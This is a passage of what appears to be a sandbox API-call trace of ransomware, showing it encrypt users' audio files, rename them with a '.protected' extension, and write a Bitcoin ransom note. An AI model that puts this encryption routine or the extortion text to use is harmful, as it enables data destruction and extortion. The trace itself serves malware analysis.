lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.335] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.335] CloseHandle (hObject=0x14c) returned 1 [0092.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav.protected") returned 118 [0092.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav.protected")) returned 1 [0092.335] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.335] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.336] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\RESTORE_FILES.txt") returned 110 [0092.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.336] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.336] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.337] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.337] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.337] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.337] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.337] CloseHandle (hObject=0xd8) returned 1 [0092.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Windows") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Program Files") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Program Files (x86)") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="$Recycle.bin") returned 1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="System Volume Information") returned -1 [0092.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrIW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".protected") returned 0x0 [0092.337] lstrcmpW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.337] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.337] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".txt") returned 0x0 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".rar") returned 0x0 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".zip") returned 0x0 [0092.337] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.338] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.338] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.338] CloseHandle (hObject=0xd8) returned 1 [0092.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav.protected") returned 105 [0092.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav.protected")) returned 1 [0092.339] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Windows") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Program Files") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Program Files (x86)") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="$Recycle.bin") returned 1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="System Volume Information") returned -1 [0092.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.339] StrStrIW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".protected") returned 0x0 [0092.339] lstrcmpW (lpString1="L51YiqIaemJw.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".txt") returned 0x0 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".rar") returned 0x0 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".zip") returned 0x0 [0092.340] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.340] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.340] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.341] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.341] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.341] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.341] CloseHandle (hObject=0xd8) returned 1 [0092.341] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3.protected") returned 99 [0092.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3.protected")) returned 1 [0092.341] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Windows") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Program Files") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Program Files (x86)") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="$Recycle.bin") returned 1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="System Volume Information") returned -1 [0092.341] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.341] StrStrIW (lpFirst="Lo3A5.wav", lpSrch=".protected") returned 0x0 [0092.342] lstrcmpW (lpString1="Lo3A5.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.342] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.342] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".txt") returned 0x0 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".rar") returned 0x0 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".zip") returned 0x0 [0092.342] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.343] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.343] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.343] CloseHandle (hObject=0xd8) returned 1 [0092.343] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav.protected") returned 92 [0092.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav.protected")) returned 1 [0092.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Windows") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Program Files") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Program Files (x86)") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="$Recycle.bin") returned 1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="System Volume Information") returned -1 [0092.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrIW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".protected") returned 0x0 [0092.344] lstrcmpW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".txt") returned 0x0 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".rar") returned 0x0 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".zip") returned 0x0 [0092.344] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.345] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.345] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.345] CloseHandle (hObject=0xd8) returned 1 [0092.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a.protected") returned 102 [0092.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 